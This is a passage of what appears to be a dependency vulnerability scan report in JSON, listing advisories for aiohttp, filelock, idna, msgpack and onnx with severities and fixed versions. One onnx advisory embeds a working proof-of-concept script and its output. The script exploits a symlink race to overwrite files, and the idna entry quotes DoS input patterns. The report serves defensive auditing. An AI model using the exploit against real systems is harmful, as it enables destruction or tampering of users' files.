"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.1, no limit was present on the number of pipelined requests that could be queued. An attacker may be able to use pipelined requests to use excessive amounts of memory, potentially leading to DoS. This vulnerability is fixed in 3.14.1.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2
},
"CVSS": {
"ghsa": {}
},
"References": [
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/dfdfa9d5aad5d21f91c79fb2ceeba0f8046cb6cf",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-4fvr-rgm6-gqmc"
],
"PublishedDate": "2026-06-22T18:16:45.743Z",
"LastModifiedDate": "2026-06-22T19:17:15.06Z"
},
{
"VulnerabilityID": "CVE-2026-54274",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54274",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ...",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.1, if an attacker sends large incomplete websocket frame payloads, it may be possible to bypass the usual size limits on memory use. This vulnerability is fixed in 3.14.1.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2
},
"CVSS": {
"ghsa": {}
},
"References": [
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/14b6ee851fb16ec199acb950de0c82d476799e7d",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-xcgm-r5h9-7989"
],
"PublishedDate": "2026-06-22T18:16:45.877Z",
"LastModifiedDate": "2026-06-22T19:17:15.693Z"
},
{
"VulnerabilityID": "CVE-2026-54276",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54276",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ...",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.1, DigestAuthMiddleware can send an authentication response after following a cross-origin redirect. This likely requires an open redirect vulnerability or similar on the target domain for an attacker to be able to execute. Further, the attacker is only receiving the digest, so should only be able to extract the user's credentials if the cryptography is weak or there is some kind of password reuse. This vulnerability is fixed in 3.14.1.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-200",
"CWE-522"
],
"VendorSeverity": {
"ghsa": 2
},
"CVSS": {
"ghsa": {}
},
"References": [
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/38d16060037e1bfcd6d677abababa3c2a4bb58fa",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hpj7-wq8m-9hgp"
],
"PublishedDate": "2026-06-22T18:16:46.133Z",
"LastModifiedDate": "2026-06-22T18:28:19.33Z"
},
{
"VulnerabilityID": "CVE-2026-54277",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54277",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ...",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.1, it is possible to bypass the max_line_size check in parts of an HTTP request in the C parser. If using the optimised C parser (the default in pre-built wheels), then an attacker may be able to send oversized lines through the HTTP parser and use an excessive amount of memory, potentially leading to DoS. This vulnerability is fixed in 3.14.1.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 2
},
"CVSS": {
"ghsa": {}
},
"References": [
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/5ab61bb4cd88f19b712f12c7c9295fe262bf804d",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hw-fmq6-xxg2"
],
"PublishedDate": "2026-06-22T18:16:46.263Z",
"LastModifiedDate": "2026-06-22T18:28:19.33Z"
},
{
"VulnerabilityID": "CVE-2026-54278",
"PkgName": "aiohttp",
"PkgIdentifier": {
"PURL": "pkg:pypi/aiohttp@3.13.2"
},
"InstalledVersion": "3.13.2",
"FixedVersion": "3.14.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54278",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio an ...",
"Description": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.1, during cleanup it is possible for a compressed request body to be decompressed into memory in one chunk. An attacker may be able to send a compressed payload in specific situations that could be decompressed into memory, potentially leading to DoS (a zip bomb edge case). This vulnerability is fixed in 3.14.1.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-409"
],
"VendorSeverity": {
"ghsa": 2
},
"CVSS": {
"ghsa": {}
},
"References": [
"https://github.com/aio-libs/aiohttp",
"https://github.com/aio-libs/aiohttp/commit/4f7480e474cccc6a8cc2c92ad3f17a31dedf8232",
"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g3cq-j2xw-wf74"
],
"PublishedDate": "2026-06-22T18:16:46.393Z",
"LastModifiedDate": "2026-06-22T18:28:19.33Z"
},
{
"VulnerabilityID": "CVE-2025-68146",
"PkgName": "filelock",
"PkgIdentifier": {
"PURL": "pkg:pypi/filelock@3.19.1"
},
"InstalledVersion": "3.19.1",
"FixedVersion": "3.20.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-68146",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "filelock: filelock: Time-of-Check-Time-of-Use (TOCTOU) race condition and symlink attack allows arbitrary file corruption or truncation",
"Description": "filelock is a platform-independent file lock for Python. In versions prior to 3.20.1, a Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. All users of filelock on Unix, Linux, macOS, and Windows systems are impacted. The vulnerability cascades to dependent libraries. The attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. The issue is fixed in version 3.20.1. If immediate upgrade is not possible, use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases); ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks; and/or monitor lock file directories for suspicious symlinks before running trusted applications. These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-59",
"CWE-362",
"CWE-367"
],
"VendorSeverity": {
"amazon": 2,
"azure": 2,
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 6.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"V3Score": 6.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 6.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2025-68146",
"https://github.com/tox-dev/filelock",
"https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e",
"https://github.com/tox-dev/filelock/pull/461",
"https://github.com/tox-dev/filelock/releases/tag/3.20.1",
"https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f",
"https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants",
"https://nvd.nist.gov/vuln/detail/CVE-2025-68146",
"https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html",
"https://ubuntu.com/security/notices/USN-7999-1",
"https://www.cve.org/CVERecord?id=CVE-2025-68146"
],
"PublishedDate": "2025-12-16T19:15:59.957Z",
"LastModifiedDate": "2026-06-17T09:58:38.02Z"
},
{
"VulnerabilityID": "CVE-2026-22701",
"PkgName": "filelock",
"PkgIdentifier": {
"PURL": "pkg:pypi/filelock@3.19.1"
},
"InstalledVersion": "3.19.1",
"FixedVersion": "3.20.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-22701",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "filelock: filelock Time-of-Check-Time-of-Use (TOCTOU) in SoftFileLock",
"Description": "filelock is a platform-independent file lock for Python. Prior to version 3.20.3, a TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. This issue has been patched in version 3.20.3.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-59",
"CWE-362",
"CWE-367"
],
"VendorSeverity": {
"amazon": 2,
"azure": 2,
"ghsa": 2,
"photon": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-22701",
"https://github.com/tox-dev/filelock",
"https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0",
"https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5",
"https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw",
"https://nvd.nist.gov/vuln/detail/CVE-2026-22701",
"https://ubuntu.com/security/notices/USN-7999-1",
"https://www.cve.org/CVERecord?id=CVE-2026-22701"
],
"PublishedDate": "2026-01-10T06:15:52.673Z",
"LastModifiedDate": "2026-06-17T10:20:15.667Z"
},
{
"VulnerabilityID": "CVE-2026-45409",
"PkgName": "idna",
"PkgIdentifier": {
"PURL": "pkg:pypi/idna@3.10"
},
"InstalledVersion": "3.10",
"FixedVersion": "3.15",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45409",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Internationalized Domain Names in Applications (IDNA) for Python provi ...",
"Description": "Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-1333"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
}
},
"References": [
"https://github.com/kjd/idna",
"https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx",
"https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
],
"PublishedDate": "2026-06-05T23:16:43.343Z",
"LastModifiedDate": "2026-06-17T10:52:01.58Z"
},
{
"VulnerabilityID": "GHSA-6v7p-g79w-8964",
"PkgName": "msgpack",
"PkgIdentifier": {
"PURL": "pkg:pypi/msgpack@1.1.2"
},
"InstalledVersion": "1.1.2",
"FixedVersion": "1.2.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://github.com/advisories/GHSA-6v7p-g79w-8964",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "MessagePack for Python: Out-of-bounds read / crash on Unpacker reuse after a caught error",
"Description": "### Impact\n\nIf the Unpacker is used repeatedly after an error occurs, the process may crash with a SEGV.\n\nIf the Unpacker is used repeatedly to unpack untrusted input from external sources, it may be vulnerable to a DoS attack.\n\n### Patches\n\nv1.2.1\n\n### Workarounds\n\nUsers should create a new Unpacker instead of reusing the same Unpacker after an error occurs.\n\nApplying the above patch can prevent SEGV, but reusing the Streaming Unpacker after it has encountered an error will not yield correct data. If an error occurs during Streaming Unpacking, the Stream and Streaming Unpacker should be discarded.\n\nTherefore, this is not just a workaround but the correct solution. The above patch only prevents crashes from incorrect usage.",
"Severity": "HIGH",
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://github.com/msgpack/msgpack-python",
"https://github.com/msgpack/msgpack-python/commit/2c56ddb5d0025ed481d962c0f5d62d19dec7476d",
"https://github.com/msgpack/msgpack-python/releases/tag/v1.2.1",
"https://github.com/msgpack/msgpack-python/security/advisories/GHSA-6v7p-g79w-8964"
],
"PublishedDate": "2026-06-19T21:42:55Z",
"LastModifiedDate": "2026-06-19T21:42:55Z"
},
{
"VulnerabilityID": "CVE-2026-27489",
"PkgName": "onnx",
"PkgIdentifier": {
"PURL": "pkg:pypi/onnx@1.17.0"
},
"InstalledVersion": "1.17.0",
"FixedVersion": "1.21.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27489",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "onnx: ONNX: Information Disclosure via Path Traversal Vulnerability",
"Description": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, a path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. This issue has been patched in version 1.21.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-23",
"CWE-61"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"V3Score": 8.6
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-27489",
"https://github.com/onnx/onnx",
"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb",
"https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73",
"https://nvd.nist.gov/vuln/detail/CVE-2026-27489",
"https://www.cve.org/CVERecord?id=CVE-2026-27489"
],
"PublishedDate": "2026-04-01T18:16:28.287Z",
"LastModifiedDate": "2026-06-17T10:27:14.62Z"
},
{
"VulnerabilityID": "CVE-2026-28500",
"PkgName": "onnx",
"PkgIdentifier": {
"PURL": "pkg:pypi/onnx@1.17.0"
},
"InstalledVersion": "1.17.0",
"FixedVersion": "1.21.0rc1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-28500",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "onnx: ONNX: Untrusted Model Repository Warnings Suppressed",
"Description": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available.",
"Severity": "HIGH",
"CweIDs": [
"CWE-345",
"CWE-494",
"CWE-693"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 4,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"V3Score": 8.6
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"V3Score": 9.1
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"V3Score": 8.6
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-28500",
"https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md",
"https://github.com/onnx/onnx",
"https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m",
"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-103.yaml",
"https://nvd.nist.gov/vuln/detail/CVE-2026-28500",
"https://www.cve.org/CVERecord?id=CVE-2026-28500"
],
"PublishedDate": "2026-03-18T02:16:24.227Z",
"LastModifiedDate": "2026-06-17T10:28:45.163Z"
},
{
"VulnerabilityID": "CVE-2026-34445",
"PkgName": "onnx",
"PkgIdentifier": {
"PURL": "pkg:pypi/onnx@1.17.0"
},
"InstalledVersion": "1.17.0",
"FixedVersion": "1.21.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34445",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "ONNX: ONNX: Denial of Service and potential information disclosure via malicious model metadata",
"Description": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, the ExternalDataInfo class in ONNX was using Python\u2019s setattr() function to load metadata (like file paths or data lengths) directly from an ONNX model file. It didn\u2019t check if the \"keys\" in the file were valid. Due to this, an attacker could craft a malicious model that overwrites internal object properties. This issue has been patched in version 1.21.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-20",
"CWE-400",
"CWE-915"
],
"VendorSeverity": {
"azure": 3,
"ghsa": 3,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"V3Score": 8.6
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H",
"V3Score": 7.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-34445",
"https://github.com/onnx/onnx",
"https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b",
"https://github.com/onnx/onnx/pull/7751",
"https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9",
"https://nvd.nist.gov/vuln/detail/CVE-2026-34445",
"https://www.cve.org/CVERecord?id=CVE-2026-34445"
],
"PublishedDate": "2026-04-01T18:16:30.5Z",
"LastModifiedDate": "2026-06-17T10:39:03.68Z"
},
{
"VulnerabilityID": "GHSA-q56x-g2fj-4rj6",
"PkgName": "onnx",
"PkgIdentifier": {
"PURL": "pkg:pypi/onnx@1.17.0"
},
"InstalledVersion": "1.17.0",
"FixedVersion": "1.21.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://github.com/advisories/GHSA-q56x-g2fj-4rj6",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "ONNX: TOCTOU arbitrary file read/write in save_external_dat ",
"Description": "### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### Toctou\nThe vulnerable code pattern:\n```python\n # CHECK - Is this a file?\n if not os.path.isfile(external_data_file_path):\n # Line 228-229: USE #1 - Create if it doesn't exist\n with open(external_data_file_path, \"ab\"):\n pass\n \n # Open for writing\n with open(external_data_file_path, \"r+b\") as data_file:\n # Lines 233-243: Write tensor data\n data_file.seek(0, 2)\n if info.offset is not None:\n file_size = data_file.tell()\n if info.offset > file_size:\n data_file.write(b\"\\0\" * (info.offset - file_size))\n data_file.seek(info.offset)\n offset = data_file.tell()\n data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCEL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) allowing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) > 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nimport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n print(f\"[*] Working directory: {tmpdir}\")\n\n # Create a \"sensitive\" file that we'll overwrite\n sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n with open(sensitive_file, 'w') as f:\n f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n original_content = open(sensitive_file, 'rb').read()\n print(f\"[*] Created sensitive file: {sensitive_file}\")\n print(f\" Original content: {original_content}\")\n\n # Create a simple ONNX model with a large tensor\n print(\"[*] Creating ONNX model with external data...\")\n\n # Create a tensor with data > 1KB (to trigger external data)\n large_array = np.ones((100, 100), dtype=np.float32) # 40KB tensor\n large_tensor = from_array(large_array, name='large_weight')\n\n # Create a minimal model\n model = helper.make_model(\n helper.make_graph(\n [helper.make_node('Identity', ['input'], ['output'])],\n 'minimal_model',\n [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n [large_tensor]\n )\n )\n\n # Save model with external data to create the external data file\n model_path = os.path.join(tmpdir, \"model.onnx\")\n external_data_name = \"data.bin\"\n external_data_path = os.path.join(tmpdir, external_data_name)\n\n onnx.save_model(\n model, \n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n\n print(f\"[+] Model saved: {model_path}\")\n print(f\"[+] External data created: {external_data_path}\")\n\n # Now comes the attack: replace the external data file with a symlink\n print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n # Remove the legitimate external data file\n if os.path.exists(external_data_path):\n os.remove(external_data_path)\n print(f\" Removed: {external_data_path}\")\n\n # Create symlink pointing to sensitive file\n os.symlink(sensitive_file, external_data_path)\n print(f\" Created symlink: {external_data_path} -> {sensitive_file}\")\n\n # Now load and re-save the model, which will trigger the vulnerability\n print(\"Loading model and saving with external data...\")\n try:\n # Load the model (without loading external data)\n loaded_model = onnx.load(model_path, load_external_data=False)\n\n # Modify the model slightly (to ensure we write new data)\n loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n # Save again - this will call save_external_data() and follow the symlink\n onnx.save_model(\n loaded_model,\n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n except Exception as e:\n print(f\"[-] Error: {e}\")\n \n # Check if the sensitive file was overwritten\n print(\"[*] Checking if sensitive file was modified...\")\n modified_content = open(sensitive_file, 'rb').read()\n \n print(f\" Original size: {len(original_content)} bytes\")\n print(f\" Current size: {len(modified_content)} bytes\")\n print(f\" Original content: {original_content[:50]}\")\n print(f\" Current content: {modified_content[:50]}...\")\n print()\n \n if modified_content != original_content:\n print(\"[!] Success!\")\n else:\n print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n Removed: /tmp/tmpqy7z88_l/data.bin\n Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n Original size: 33 bytes\n Current size: 40033 bytes\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n Current content: b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nSuccessfully overwritting the \"sensitive data\" file.\n\n### Impact\nThe impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. Path canonicalization",
"Severity": "HIGH",
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"V3Score": 7.1
}
},
"References": [
"https://github.com/onnx/onnx",
"https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6"
],
"PublishedDate": "2026-04-01T23:40:58Z",
"LastModifiedDate": "2026-06-08T20:15:31Z"
},
{
"VulnerabilityID": "CVE-2026-34446",
"PkgName": "onnx",
"PkgIdentifier": {
"PURL": "pkg:pypi/onnx@1.17.0"
},
"InstalledVersion": "1.17.0",
"FixedVersion": "1.21.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34446",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "onnx: ONNX: Information disclosure through hardlink path traversal",
"Description": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is an issue in onnx.load, the code checks for symlinks to prevent path traversal, but completely misses hardlinks because a hardlink looks exactly like a regular file on the filesystem. This issue has been patched in version 1.21.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-22",
"CWE-61"
],
"VendorSeverity": {
"azure": 2,
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"V3Score": 4.7
},
"nvd": {
